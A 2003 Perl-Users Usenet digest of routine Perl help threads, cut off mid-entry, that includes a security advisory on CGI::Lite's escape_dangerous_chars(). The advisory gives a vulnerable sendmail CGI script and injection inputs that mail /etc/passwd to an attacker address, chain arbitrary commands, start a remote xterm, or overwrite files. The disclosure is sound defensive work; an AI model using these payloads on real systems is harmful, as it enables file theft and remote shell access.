[22329] in Perl-Users-Digest


home	help	back	first	fref	pref	prev	next	nref	lref	last	post
Perl-Users Digest, Issue: 4550 Volume: 10

daemon@ATHENA.MIT.EDU (Perl-Users Digest)
Tue Feb 11 14:06:20 2003

Date: Tue, 11 Feb 2003 11:05:09 -0800 (PST)
From: Perl-Users Digest <Perl-Users-Request@ruby.OCE.ORST.EDU>
To: Perl-Users@ruby.OCE.ORST.EDU (Perl-Users Digest)

Perl-Users Digest           Tue, 11 Feb 2003     Volume: 10 Number: 4550

Today's topics:
        **URGENT** Finding the number of open file descriptors  (amar)
    Re: **URGENT** Finding the number of open file descript (Walter Roberson)
    Re: **URGENT** Finding the number of open file descript <wichmann@uni-wuppertal.de>
    Re: [Regex] Removing lines not containing a substring <goldbb2@earthlink.net>
    Re: ActivePerl, upgraded then downgraded, problems! (Randy Kobes)
    Re: building hash <goldbb2@earthlink.net>
    Re: building hash <bigj@kamelfreund.de>
    Re: building hash ctcgag@hotmail.com
        createing a daemon <ryan@dctnet.net>
    Re: createing a daemon <hekmanATgeo-slopeDOTcom@no.spam>
        DBD::mysql not loading mysql.dll (Allen)
    Re: Does anyone know if ... <tore@aursand.no>
        extracting JS links with Perl (Walter Pienciak)
    Re: Insecure Filehandle Dependencies <j.j.konkle-parker@larc.nasa.gov>
    Re: Insecure Filehandle Dependencies <j.j.konkle-parker@larc.nasa.gov>
    Re: Insecure Filehandle Dependencies <j.j.konkle-parker@larc.nasa.gov>
    Re: Insecure Filehandle Dependencies <bigj@kamelfreund.de>
    Re: Insecure Filehandle Dependencies (Walter Roberson)
    Re: iterator in for loop (squillion)
    Re: newbie date comparison <pvaratha@ford.com>
    Re: Paging output <goldbb2@earthlink.net>
    Re: RegEx Questions <mememe@meme.com>
    Re: Scope of a global lexical <goldbb2@earthlink.net>
        Security bug in CGI::Lite::escape_dangerous_chars() fun (Ronald F. Guilmette)
    Re: Storing `ls -R` into an array (William English)
        trailing conditional - apparently inconsistent syntax r (squillion)
        XML parsing and array-context problem (Jesse Sheidlower)
    Re: XML parsing and array-context problem <goldbb2@earthlink.net>
    Re: XML parsing and array-context problem (Jesse Sheidlower)
    Re: XML parsing and array-context problem (Anno Siegel)
    Re: XML parsing and array-context problem <goldbb2@earthlink.net>
        Digest Administrivia (Last modified: 6 Apr 01) (Perl-Users-Digest Admin)

----------------------------------------------------------------------

Date: 11 Feb 2003 08:19:24 -0800
From: amarsantpur@hotmail.com (amar)
Subject: **URGENT** Finding the number of open file descriptors using perl
Message-Id: <51db1bd3.0302110819.76698483@posting.google.com>

Hello,

  I just want to find the number of file descriptors/handles which are open
at a particular instant when a perl program is getting executed.  If i can
print out those file handles that will be great.

  Can anyone help me out in this??  An early reply is appreciated bcoz. i got
stuck in debugging my code.

Thanks & Regards,
Amar.


------------------------------

Date: 11 Feb 2003 16:29:26 GMT
From: roberson@ibd.nrc-cnrc.gc.ca (Walter Roberson)
Subject: Re: **URGENT** Finding the number of open file descriptors using perl
Message-Id: <b2b8d6$dl8$1@canopus.cc.umanitoba.ca>

In article <51db1bd3.0302110819.76698483@posting.google.com>,
amar <amarsantpur@hotmail.com> wrote:
:  I just want to find the number of file descriptors/handles which are open
:at a particular instant when a perl program is getting executed.  If i can
:print out those file handles that will be great.

:  Can anyone help me out in this??  An early reply is appreciated bcoz. i got
:stuck in debugging my code.

If you are on a POSIX compliant box, then you can create a system
call to sysconf(_SC_OPEN_MAX), which will return "Maximum number
of files that one process can have open at a given time." Typical
sorts of values are 100 or 250 or 255. 

Once you know the maximum number of open files, you can iterate
through, testing each fd in turn, such as asking for a system
call to the system read function specifying the fd number, and 
checking the details of the return value to find out if the 
fd was open at all. 

Unfortunately, the technique I outline is not able to make a connection
between FILEHANDLE and fd, so it would be useful only for testing
to find out how many handles you had open.


There's probably a better way, and there would certainly be a way
involving poking around in perl's internals.


I'm having a bit of difficulty in picturing at the moment how your
debugging will benefit from knowing how -many- handles you have open??
-- 
Contents: 100% recycled post-consumer statements.


------------------------------

Date: Tue, 11 Feb 2003 17:22:24 +0100
From: Ingo Wichmann <wichmann@uni-wuppertal.de>
Subject: Re: **URGENT** Finding the number of open file descriptors using perl
Message-Id: <b2b88f$thc$03$1@news.t-online.com>

amar schrieb:
>   I just want to find the number of file descriptors/handles which are open
> at a particular instant when a perl program is getting executed.  If i can
> print out those file handles that will be great.

lsof is a unix-command for that purpose.

there is a windows tool too, but i forgot the name. search for "find 
open files windows" on google.

Ingo

PS: The word **URGENT** is one of the first to filter by a spamfilter



------------------------------

Date: Tue, 11 Feb 2003 12:43:51 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: [Regex] Removing lines not containing a substring
Message-Id: <3E493657.B954E55@earthlink.net>

Allan Cady wrote:
[snip]
>    # Load data
>    read(DATA, $data, 65536);

It's more idiomatic to do:

   read(DATA, $data, -s DATA);

Which ensures that you really do have the whole thing.

Or to be even more idiomatic, do:

   $data = do { local $/; <DATA> };

[snip]

Naah, that code does too much work.

Try this:

   print $1 while $data =~ /^\s*(<td.*)/mgi;

-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: 11 Feb 2003 16:47:36 GMT
From: randy@theoryx5.uwinnipeg.ca (Randy Kobes)
Subject: Re: ActivePerl, upgraded then downgraded, problems!
Message-Id: <slrnb4i9sh.nq6.randy@theoryx5.uwinnipeg.ca>

On Tue, 11 Feb 2003 07:38:14 GMT, 
   Philip Lees <pjlees@ics.forthcomingevents.gr> wrote:
>On 10 Feb 2003 15:24:50 GMT, randy@theoryx5.uwinnipeg.ca (Randy Kobes)
>wrote:
[ .. ]
>>The message about "not intended for this build ..." means
>>that ppm found a ppd file whose name matched what you were
>>after, but the ARCHITECTURE tag in the ppd file didn't
>>correspond to your system. 
>
>Checking again I see that Apache::Session mentions only Linux, but 
>the CGI::Session page gives the following spec:
>
>PPM Platforms: Linux Solaris Windows  
>Version: CGI-Session 0.01  
>Perl Version: 5.6 
>
>http://aspn.activestate.com/ASPN/Modules/dist_html?dist_id=11032

I think that's a mistake - the CGI-Session.zip package from
http://ppm.activestate.com/PPMPackages/zips/6xx-builds-only/
only contains a 'i686-linux-thread-multi' build.

-- 
best regards,
randy kobes


------------------------------

Date: Tue, 11 Feb 2003 12:26:12 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: building hash
Message-Id: <3E493234.D34CCB4B@earthlink.net>

joeri wrote:
> 
> Hi,
> 
> I have a 75 MB file consisting of lines that look like:
> 
> S0973708    Other operation on meninges OS
> S0873517    Excision of lesion of brain meninges
> S0873177    Excision brain meninges lesion
> S1295875    Removal of lesion of brain meninge
> 
> The first element on each line is some sort of ID, followed by a tab,
> followed by some string.
> I want to load these into a hash like so, assuming that IN is the
> filehandle associated with the above file:
> 
> while(<IN>) {
>     $string{$1}={$2} if $_ =~ /(.*)\t(.*)\n/;
> }
>
> This goes pretty fast at the start, but really slows down as the hash
> grows bigger.

As others have said, that's most likely due to the amount of memory that
the hash is taking up.  Try changing it to:

while(<IN>) {
    $string{$1} = $2 if $_ =~ /(.*?)\t(.*)/;
}

And I expect that it will go faster.

If you know the format of the ID strings, you can probably get the hash
keys to take up less memory.  For example, if the ID string is *always*
a letter followed by 9 digits, then you can do:

while(<IN>) {
   $string{$a.pack 'N', $2} = $3 if /(.)(.*?)\t(.*)/;
}

This produces 5 byte keys, instead of 10 byte keys... *if* this reduces
the amount of memory allocated per key (it should, I think, but might
not, depending on the vaguaries of malloc()), then it will result in
less memory allocated overall, and thus run faster.

> This is probably due to the fact that while assigning a
> value to a key, Perl checks to see if the key already
> exists. The question here is, if I'm sure that the keys I will be
> using for the hash are unique, so that there is no need to check if
> the key already exists, can I build a hash or something similar for
> quick lookup later more rapidly?

You *always* need to check if the key already exists, *but* this takes
just about zero time, since it's done at the C level, with a single
instruction, just before the actual insertion takes place.

Really the biggest cost is time for allocating memory.

If you were to tell perl to pre-allocate memory for the hash, before you
go inserting data, you'll get a significant speedup.

Assuming 64 bytes/line, pre-allocate using:

   keys(%string) = -s IN / 64;

Or, to dynamically guess the number of lines in the file:

my $size = -s IN;
keys(%string) = $size / 64;
while(<IN>) {
    keys(%string) = ( $. / tell IN ) * $size;
       unless $. & 0xfff;
    $string{$1} = $2 if $_ =~ /(.*?)\t(.*)/;
}

This says, every 4096 lines, make a guess as to how many lines there are
per byte, and multiply that by how many bytes there are in the file, and
that's how many lines there probably are.

-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: Tue, 11 Feb 2003 16:49:17 +0100
From: "Janek Schleicher" <bigj@kamelfreund.de>
Subject: Re: building hash
Message-Id: <pan.2003.02.11.15.21.56.544093@kamelfreund.de>

On Tue, 11 Feb 2003 13:37:01 +0000, Tassilo v. Parseval wrote:

> Also sprach Janek Schleicher:
> 
>> ...
> 
> The thread reminds me of an idea I had been mind-toying with lately.
> Writing a module (with a tie() interface) that makes all Perl data-types
> store the data zlib-compressed. It could be done in XS to gain some
> speed but it's probably less trivial than it sounds since on a an
> ordinary FETCH the data would need to be decompressed and could thusly
> explode your memory.

Great idea!

Perhaps you don't need to compress everything. I would suggest to compress
on block base, while a compressed block is assigned to some hash keys (or
% a number). If that would be chunks of perhaps 1024 byte, the compression
would be not perfect, but at least reducing the size by more than 50%
(assuming large textural data). Then you only would need a normal hash or
similar to remember what blocks are assigned to what hash keys.

I'm afraid my explanation is confusing. But the main idea is simply to
compress not all together, but in seperated blocks that can be
distinguished by e.g. the hash value. That would have also the advantage
that it could be used efficient in RAM as also on DISK.


Looking forward to such a module,
Greetings,
Janek


------------------------------

Date: 11 Feb 2003 17:24:01 GMT
From: ctcgag@hotmail.com
Subject: Re: building hash
Message-Id: <20030211122401.239$GM@newsreader.com>

"joeri" <jvandervloet@hotmail.com> wrote:
> Hi,
>
> I have a 75 MB file consisting of lines that look like:
>
> S0973708    Other operation on meninges OS
> S0873517    Excision of lesion of brain meninges
> S0873177    Excision brain meninges lesion
> S1295875    Removal of lesion of brain meninge
 ...
> This goes pretty fast at the start, but really slows down as the hash
> grows bigger.


I'm estimating your lines are 40 bytes long, so that's
~2M rows.  Each one goes into a hash with 8 byte key, ~30 byte
value.  I get about 140 bytes memory usage per pair on
simulated date, so that's about 280 Meg total.  I don't know what
other programs you have running, or what other data you have in this
program, but you might be swapping.  Do you hear the hard drive thrashing?
Check with 'top' or 'ps' (unix) or whatever (non-unix) to see what the
process sizes are.

Is there some kind of check-sum built into that key?  If so, it can really
screw up the hashing, especially in older versions.  (I've been burned by
that in 5.005.03).  Load half the file (or however long you are willing to
wait) then print the hash in scalar context and the keys in scalar context
to see how many buckets are being used.  If you have 1_000_000 keys but the
bucket usage is 4/8, than that's the problem.  (I happened to fix this
problem by preassigning buckets, keys %hash=500_000, but that won't always
work)


> This is probably due to the fact that while assigning a value to a key,
> Perl checks to see if the key already
> exists.

Unless your hash is degenerating badly, this checking is extremely
fast.

> The question here is, if I'm sure that the keys I will be using
> for the hash are unique, so that there
> is no need to check if the key already exists, can I build a hash or
> something similar for quick
> lookup later more rapidly?

No.  Unless your hashing is degenerate, the check is trivially fast.
If the hashing is degenerate, then it could be theoretically possible
to speed up considerably by not checking (if perl uses an unordered
list in each bucket), but I don't think perl provides a way to do that.
And even if you could, look-ups in that hash would still be slow.


Xho

-- 
-------------------- http://NewsReader.Com/ --------------------
Usenet Newsgroup Service              New Rate! $9.95/Month 50GB


------------------------------

Date: Tue, 11 Feb 2003 13:19:10 -0500
From: ryan <ryan@dctnet.net>
Subject: createing a daemon
Message-Id: <pan.2003.02.11.13.19.09.119902.20427@dctnet.net>

Hi, 
	I was wondering if anyone can point me to some information about
creating a daemon with perl.  I want it to run from the init.d and be
able to use the start|stop|restart options.  It will just proccess a
queue file, so it won't be all that complex. Any help would be greatly
appreciated.  I don't really want to have it run as a cron job, as it
will not be as robust as I would like it to be.  Thanks again.

Ryan


------------------------------

Date: Tue, 11 Feb 2003 11:43:20 -0700
From: "Nathaniel Hekman" <hekmanATgeo-slopeDOTcom@no.spam>
Subject: Re: createing a daemon
Message-Id: <%vb2a.912$xa.220505@localhost>

http://www.webreference.com/perl/tutorial/9/ talks about how to run a
process as a daemon, though it doesn't address using init.d.  Half the
battle anyway...


Nate

"ryan" <ryan@dctnet.net> wrote in message
news:pan.2003.02.11.13.19.09.119902.20427@dctnet.net...
> Hi,
> I was wondering if anyone can point me to some information about
> creating a daemon with perl.  I want it to run from the init.d and be
> able to use the start|stop|restart options.  It will just proccess a
> queue file, so it won't be all that complex. Any help would be greatly
> appreciated.  I don't really want to have it run as a cron job, as it
> will not be as robust as I would like it to be.  Thanks again.
>
> Ryan




------------------------------

Date: 11 Feb 2003 09:23:17 -0800
From: umayxa3@yahoo.com (Allen)
Subject: DBD::mysql not loading mysql.dll
Message-Id: <dc2b29ad.0302110923.77618a55@posting.google.com>

On a Microsoft box, I've got ActivePerl installed and I've installed
DBD::mysql through >ppm.
I installed DBD::mysql through this command:
ppm> install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd

Now I am getting the error below. 
Can someone point me in a direction on how to have the server
recognize this DLL? What's the problem with this?

Thanks for any help.

-Allen


CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:

-----
Can't load 'C:/Perl/site/lib/auto/DBD/mysql/mysql.dll' for module
DBD::mysql: load_file:The specified procedure could not be found at
C:/Perl/lib/DynaLoader.pm line 229.
 at C:\mysite\cgi-bin\getprice.cgi line 13
Compilation failed in require at C:\mysite\cgi-bin\getprice.cgi line
13.
BEGIN failed--compilation aborted at C:\mysite\cgi-bin\getprice.cgi
line 13.

---
Line 12 and 13 of the CGI:
use DBI;
use DBD::mysql;


------------------------------

Date: Tue, 11 Feb 2003 17:40:38 +0100
From: "Tore Aursand" <tore@aursand.no>
Subject: Re: Does anyone know if ...
Message-Id: <pan.2003.02.11.16.40.38.487282@aursand.no>

On Tue, 11 Feb 2003 15:16:14 +0000, Basil Skordinski wrote:
> Does anyone know if there are any Perl modules out there somewhere
> that could make it possible and easy to program a desired interaction
> with a remote web site?

These modules should help you out:

  o WWW::Mechanize
  o LWP::UserAgent

You'll find them om http://www.cpan.org/


--
Tore Aursand - tore@aursand.no - http://www.aursand.no/


------------------------------

Date: 11 Feb 2003 17:50:31 GMT
From: walter@io.frii.com (Walter Pienciak)
Subject: extracting JS links with Perl
Message-Id: <3e4937e7$0$17990$75868355@news.frii.net>

Hi,

More and more I see HTML developers using embedded javascript to
"link to" other files.

My Perl-based upload mechanisms check that links actually work,
but this JS stuff increasingly seem to be cut-and-paste jobs with
a corresponding increase in "broken crap" being included.

Right now, I'm dealing with it via brute-force methods -- regexps
tuned to functions in specific .js files, where I eyeballed the
link code -- but this is like fighting the tide, and doesn't scale.

Is anyone else dealing with this problem effectively?  How?
(Forbidding JS is just not an option for me, sorry.)

Walter


------------------------------

Date: Tue, 11 Feb 2003 11:16:44 -0500
From: Joel Konkle-Parker <j.j.konkle-parker@larc.nasa.gov>
Subject: Re: Insecure Filehandle Dependencies
Message-Id: <3E4921EC.5070507@larc.nasa.gov>

> OK, it _has_ been encapsulated here in some code which, in fact,
> renders it safe, but wouldn't it be better general advice to untaint
> $filename with an appropriate regexp?  (a slight re-casting of the
> other statements seems to be all that it needs).
> 
> IMHO and YMMV, cheers
> 


What would the appropriate regexp be?



------------------------------

Date: Tue, 11 Feb 2003 11:21:08 -0500
From: Joel Konkle-Parker <j.j.konkle-parker@larc.nasa.gov>
Subject: Re: Insecure Filehandle Dependencies
Message-Id: <3E4922F4.4030404@larc.nasa.gov>

> This is a sanity check but it is not yet proper untainting of the data.
> Currently you make sure that $filename wont contain any characters other
> than alphanumericals and _. You have to apply a capturing pattern-match
> to untaint the data:
> 
>     if ($rawfilename !~ /\W/) {
>         ($filename) = $rawfilename =~ /(.*)/;
>     }
> 
> $filename is now an exact copy of $rawfilename but it is no longer
> tainted so you can eventually use it as an argument to open():
> 
> 
>>open (TRAIL, ">$filename.txt") || die $!."\n";
>>
> 
> Tassilo
> 

I've included my code snippet below. The -T switch is still complaining 
about insecure dependencies on that line.

if ($rawfilename !~ /\W/) {
   ($filename) = $rawfilename =~ /(.*)/; #this line
}



------------------------------

Date: Tue, 11 Feb 2003 11:21:41 -0500
From: Joel Konkle-Parker <j.j.konkle-parker@larc.nasa.gov>
Subject: Re: Insecure Filehandle Dependencies
Message-Id: <3E492315.7060307@larc.nasa.gov>

If it matters, this is Perl 5.004



------------------------------

Date: Tue, 11 Feb 2003 16:07:57 +0100
From: "Janek Schleicher" <bigj@kamelfreund.de>
Subject: Re: Insecure Filehandle Dependencies
Message-Id: <pan.2003.02.11.15.07.55.625104@kamelfreund.de>

On Tue, 11 Feb 2003 11:16:44 -0500, Joel Konkle-Parker wrote:

>> OK, it _has_ been encapsulated here in some code which, in fact,
>> renders it safe, but wouldn't it be better general advice to untaint
>> $filename with an appropriate regexp?  (a slight re-casting of the
>> other statements seems to be all that it needs).
>> 
>> IMHO and YMMV, cheers
>> 
> 
> 
> What would the appropriate regexp be?

I would propose

/\w+(.\w+)*/

That would allow normal filenames like
filename.txt, archive.tar.gz
but disallow dangerous like
/etc/passwd or ../../../../etc/hosts

The exact definition depends on which files the user should be allowed
to get access to.


Greetings,
Janek


------------------------------

Date: 11 Feb 2003 17:23:37 GMT
From: roberson@ibd.nrc-cnrc.gc.ca (Walter Roberson)
Subject: Re: Insecure Filehandle Dependencies
Message-Id: <b2bbip$f4o$1@canopus.cc.umanitoba.ca>

In article <pan.2003.02.11.15.07.55.625104@kamelfreund.de>,
Janek Schleicher <bigj@kamelfreund.de> wrote:
:I would propose

:/\w+(.\w+)*/

:That would allow normal filenames like
:filename.txt, archive.tar.gz
:but disallow dangerous like
:/etc/passwd or ../../../../etc/hosts

I suspect you wanted to quote the '.', not to allow it to stand
for "any one character". You probably didn't want to allow matches
against  foo/bar$baz
-- 
This is not the same .sig the second time you read it.


------------------------------

Date: 11 Feb 2003 10:44:29 -0800
From: squillion@hotmail.com (squillion)
Subject: Re: iterator in for loop
Message-Id: <81016f2d.0302111044.6208ec8@posting.google.com>

many thanks for all responses, much appreciated!


------------------------------

Date: Tue, 11 Feb 2003 11:51:38 -0500
From: "Pathman" <pvaratha@ford.com>
Subject: Re: newbie date comparison
Message-Id: <b2b9mr$fs12@eccws12.dearborn.ford.com>

You may have to install Time perl module and need to
use Time::ParseDate

when you use ( parsedate($curtime) - parsedate($crdate )  it should give the
difference in seconds. you should keep a standard date format for $curtime
and $crtime.
"Andy" <post@forum.please> wrote in message
news:b26295$8tk$1@helle.btinternet.com...
> Hi,
> How can I arithmetically compare 2 dates. I am writing a script that needs
> to remove files that are more than 2days old which are stored in
directories
> ../Mon ../Tue etc.
> Do I have to load a module ? Below, $curtime is the current system time
and
> $crdate is the file inode creation date.
> If $crdate is 2 days older than $curtime then I need to delete the file,
but
> I cant work out how to compare them.
>
> $basedir="d:/data/perl/tranlogs";
> @days=qw(Mon Tue Wed Thu Fri Sat Sun);
> $curtime=scalar localtime();
>
> foreach $day (@days) {
>      $skel=${basedir}."/".${day}."/*.log" ;
>      @files=glob($skel);
>      foreach $file (@files) {
>           $crdate=(stat ($file))[10];
>      }
> }
>
> Any help is much appreciated.
> Thanks
> Andy
>
>




------------------------------

Date: Tue, 11 Feb 2003 12:31:38 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: Paging output
Message-Id: <3E49337A.430BED5C@earthlink.net>

Anirban Banerjee wrote:
> 
> How do I do it inside the perl script? I mean everything, even
> <tab><tab> ( I am using ReadLine ) should give me paged output, and
> this should be transparent to the individual functions.

To page perl's output, you can do:

   if( -t STDOUT ) {
      my @pagers = qw(less more pg);
      unshift @pagers, $ENV{MORE} if exists $ENV{MORE};
      for my $pager ( @pagers ) {
         open( STDOUT, "|-", $pager ) and last;
      }
      warn "Couldn't page STDOUT: $!" unless -p STDOUT;
   } else {
      # STDOUT is already being redirected to a pager or
      # to a file or to some other program.
   }


-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: Tue, 11 Feb 2003 09:54:07 -0700
From: "ColdCathoids" <mememe@meme.com>
Subject: Re: RegEx Questions
Message-Id: <b2b9ri$1a6ftb$1@ID-158028.news.dfncis.de>


"Tore Aursand" <tore@aursand.no> wrote in message
news:pan.2003.02.10.22.29.23.411656@aursand.no...
> On Mon, 10 Feb 2003 10:42:14 -0700, ColdCathoids wrote:
>
> Quick and dirty, but should work. :)
>
>   #!/usr/bin/perl
>   #
>   use strict;
>   use warnings;
>
>   while ( <DATA> ) {
>
s/^(.*)\s+on\s+(.*)\s+(\d+\.\d+)\s+(\d+\.\d+)\s+(.*)$/$1,$2,$3,$4,$5/;
>       print;
>   }

Whoo hoo! That's perfect! That does exactly what I want. You have made me
hero of the day!

Now ... any chance you could explain what that line actually does? =)




------------------------------

Date: Tue, 11 Feb 2003 12:37:27 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: Scope of a global lexical
Message-Id: <3E4934D7.5659834E@earthlink.net>

Greg wrote:
> eric wrote:
> > Greg wrote:
> > > use strict;
> > > use warnings;
> > >
> > > smith();
> > >
> > > my $global = 3;
> > >
> > > sub smith{
> > >    print $global || 'undef', "\n";
> > > }
> > >
> > > This prints 'undef' when run in my local Perl 5.6 installation.
> > > How can the body of smith() be interpreted without the assignment
> > > of 3 to $global having taken place?
> >
> > the line
> > my $global = 3;
> > causes $global to be recognized at compile time, and set to 3 at run
> > time.
> > the compile-time recognition means that sub smith can access $global
> > without generating a compile-time error under strict 'vars'.
> > the run-time assignment does not happen until after the call to sub
> > smith, so $global is undefined when sub smith runs.
[snip]
> I see. So, the statement my $global = 3; is executed both at compile
> time and run time. I should have seen this.

Well, part of it is executed at compile time, and part is executed at
run time.

> I'm used to C behavior.

Out of curiousity, when you do, in C:

   static int foo = 3;

Does the '3' get stored in the memory for 'foo' at compile time, or at
_start() time (before main() is called), or somewhere in between?

In other words, if I have a function which is called from _start, will
the 'foo' variable be initialized?

-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: Tue, 11 Feb 2003 18:44:51 -0000
From: rfg@monkeys.com (Ronald F. Guilmette)
Subject: Security bug in CGI::Lite::escape_dangerous_chars() function
Message-Id: <v4ih53t0l1ng7b@corp.supernews.com>

CC: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org

============================================================================
SUBJECT
	Security bug in CGI::Lite::escape_dangerous_chars() function, part
	of the CGI::Lite 2.0 package, and earlier revisions thereof.

SUMMARY
	The CGI::Lite::escape_dangerous_chars() function fails to escape
	the entire set of special characters that may have significance
	to the underlying shell command processor.  When the function is
	used from within a web CGI script which processes arbitrary user
	input from some HTML form, an attacker may be able to read and/or
	write some or all local files and may be able to obtain shell-
	level access to the attacked web server.

SCOPE
	Any and all UNIX and/or Linux systems which incorporate the Perl
	CGI::Lite module, or onto which this module has been installed.

	It appears likely that any/all MS Windows systems onto which the
	Perl CGI::Lite module has been installed may also be affected,
	however the author of this advisory HAS NOT verified that.

IMPACT
	If the CGI::Lite::escape_dangerous_chars() function is used within
	(for example) a web CGI script, a remote attacker may be able to
	read and/or write local files on the attacked web server and/or
	may be able to gain shell-level access to the attacked web server,
	via the CGI script, as the user-id under which the CGI script is
	executed (typically, but not always the `nobody' user).

	The potential exists for remote root compromise (or other privileged
	access) if a CGI script using CGI::Lite::escape_dangerous_chars() is
	installed as set-uid (root) or set-gid.

DISCUSSION
	Although poorly documented, the CGI::Lite::escape_dangerous_chars()
	function appears to be a function whose purpose is to modify an
	input character string in a way so that ``dangerous'' characters
	which might otherwise have special significance to an underlying
	shell command processor will each be preceded by a backslash
	(escape) character in the resulting output string.  The intent is
	clearly to convert possibly dangerous user input strings into
	benign forms that, when provided as command line arguments to an
	underlying shell command processor, will not have any undesirable
	and/or unanticipated effects.  (The classical example is the semi-
	colon character, which acts as a command separator for most UNIX
	and/or Linux shell command processors.)

	It is reasonable to believe that CGI::Lite::escape_dangerous_chars()
	has, in all probability, been used for exactly this purpose (i.e.
	rendering user input strings ``harmless'' in advance of their being
	provided, as arguments, to an underlying shell processor) in many
	existing Perl CGI scripts.

	Unfortunately, CGI::Lite::escape_dangerous_chars() fails to escape
	many of the characters mentioned as possibly dangerous characters
	in the WWW security FAQ (Question 7), specifically:

		\  -  backslash
		?  -  question mark
		~  -  tilde
		^  -  carat
		\n -  newline
		\r -  carriage return

	Note that all or most of these character _do_ in fact have special
	meaning, when presented as parts of command line arguments to
	various UNIX and/or Linux shell command processors (and, I suspect,
	probably MS Windows shell command line processors also).

	Below is a trivially simple example of how this security flaw can
	cause a problem, in practice:

	=====================================================================
	#!/usr/bin/perl -w

	use strict;
	use CGI::Lite;

	my $cgi = new CGI::Lite;
	my %form = $cgi->parse_form_data;
	my $recipient = $form{'recipient'};

	my $message = "From: sender\nSubject: Hello\n\nHello my friend!\n\n";

	$recipient = escape_dangerous_chars ($recipient);

	open (SM, "|/usr/sbin/sendmail -f rfg $recipient");
	print SM $message;
	close SM;

	print "Content-Type: text/html\n\n";
	print "<HTML>\n";
	print "<HEAD></HEAD>\n";
	print "<BODY>\n";
	print "Thank you.  Your request has been processed\n";
	print "</BODY>\n";
	print "</HTML>\n";
	=====================================================================

	The Perl CGI script above might be constructed to act as the back-end
	(CGI) handler for a simple web page that allows a web visitor to enter
	his/her e-mail address into a text field on the form, and thereby
	trigger the automated sending of some pre-canned (or dynamically
	computed) e-mail message to the user-supplied e-mail address.
	
	Note that the escape_dangerous_chars function is used to ``sanitize''
	the user-supplied input string before it is used as an argument to
	the Perl open function.

	Unfortunately, the fact that escape_dangerous_chars fails to properly
	backslash-escape any backslash characters contained in its input string
	has very serious security consequences for the simple CGI script shown
	above.  Consider what would happen if a web visitor entered the string:

	attacker@example.com \</etc/passwd
	
	Note that after escape_dangerous_chars is applied to this user input,
	the resulting string will be
	
	attacker@example.com \\</etc/passwd
	
	and that exact string will be passed to the underlying shell command
	processor via the Perl open call.

	The unfortunate result of this sequence of events would be that a
	copy of the local password file would be e-mailed, both to
	<attacker@example.com> and also to the (almost certainly non-existent)
	local user whose user-id is a single backslash character.  (Most
	UNIX/Linux shells will see the \\ as a single backslash-escaped
	backslash character.  That single backslash character will then
	be treated as being just another member of the list of destination
	e-mail addresses for the outgoing e-mail message by sendmail.)
	
	In this example, the account, if any, to which e-mail addresses to the
	(non-existent?) local user-id '\' is directed will vary, depending
	upon whether one is using ``real'' Sendmail or, as I do, a mostly
	compatible Sendmail clone (Postfix).  It may also depend, of course,
	on how exactly the local mail server has been configured.  E-mail
	sent to the local user '\' may in some cases be automatically re-
	directed to the `nobody' account, which is to say to /dev/null, in
	which case no local user or administrator would have any idea that
	anything untoward or undesirable had even taken place.

	Regardless of where the _second_ copy of the e-mail message goes
	however, the damage has already been done... <attacker@example.com>
	_will_ be e-mailed a copy of the local password file... or any other
	attacker-selected file residing on the exploited system.
	
	Other similar (but perhaps even more damaging) kinds of exploits are
	also possible, for example:
	
	attacker@example.com\|other-command
	
	or perhaps:
	
	attacker@example.com\;other-command
	
	where `other-command' is `xterm' followed by a set of arguments needed
	to start up a remotely-accessible xterm window.  Also, depending on
	permissions, local files on the exploited machine could be created or
	overwritten, e.g. via:
	
	attacker@example.com\>/tmp/new-file
	attacker@example.com\>/tmp/unprotected-file
	
CONCLUSION
	It is clear that CGI::Lite::escape_dangerous_chars fails to properly
	backslash-escape backslash characters themselves, and other characters
	that may have special significance to the underlying shell command
	processor, when such characters are present in the input string.

	It is also clear that this failure can lead, and probably already
	has led, in many cases, to trivially-exploitable CGI scripts via
	which remote attackers can read files, write files, create files,
	and probably even obtain a remote shell access on the exploited
	target system(s).
	
	Note that that even if a CGI script using escape_dangerous_chars goes
	to the additional trouble of deleting all whitespace characters from
	user-supplied HTML form text field values (e.g. via s/\s//g) in ad-
	dition to applying escape_dangerous_chars to sanitize the input, the
	elimination of whitespace characters is quite definitely NOT sufficient
	to prevent all possible exploits, as illustrated in the examples above.

FIX
	One possible fix for this problem is simple and obvious. The
	escape_dangerous_chars could be hacked to include, in the set of
	characters that it will escape, the backslash character and other
	special characters from the complete set of ``dangerous'' characters
	as documented in the WWW Security FAQ.  (A patch which effects this
	change is available from the author of this advisory upon request.)

	The advisability of this specific ``quick and dirty'' fix has been
	questioned by multiple parties however.  (Some say that it would
	better to list the set of characters which are safe to NOT escape,
	and then just have the function escape every character that is NOT
	in that ``safe'' character set.)

ADVISORY AUTHOR
	Ronald F. Guilmette <rfg@monkeys.com>

ADVISIORY DATE
	February 11, 2003

DISCLOSURE HISTORY
	Multiple attempts were made to advise both the current maintainer of
	the CGI::Lite module (b.d.low@ieee.org) and also the administrator
	of the CPAN Perl archive web site (cpan@perl.org) beginning on
	January 10th, 2003, regarding this security bug/issue.  To the
	present date, no response of any kind was received from ether party.

	CERT (cerg.org) was advised of the details of this security issue
	on January 22nd, 2003, and responded that they would notify and
	canvas their affiliated software vendors on this issue.  As of
	this writing, CERT has not provided any indication that any of
	their affiliated software vendors are affected by this issue.

	<security@redhat.com> was also notified in January 22nd, 2003.
	A representative of RedHat responded that RedHat is not affected
	by this security issue, but promised to notify other relevant
	software vendors of this issue.


------------------------------

Date: 11 Feb 2003 09:49:33 -0800
From: william_english@mentor.com (William English)
Subject: Re: Storing `ls -R` into an array
